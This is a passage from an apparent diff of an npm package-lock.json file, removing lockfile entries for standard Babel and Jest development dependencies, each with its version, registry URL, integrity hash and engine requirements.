"https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, - "node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": 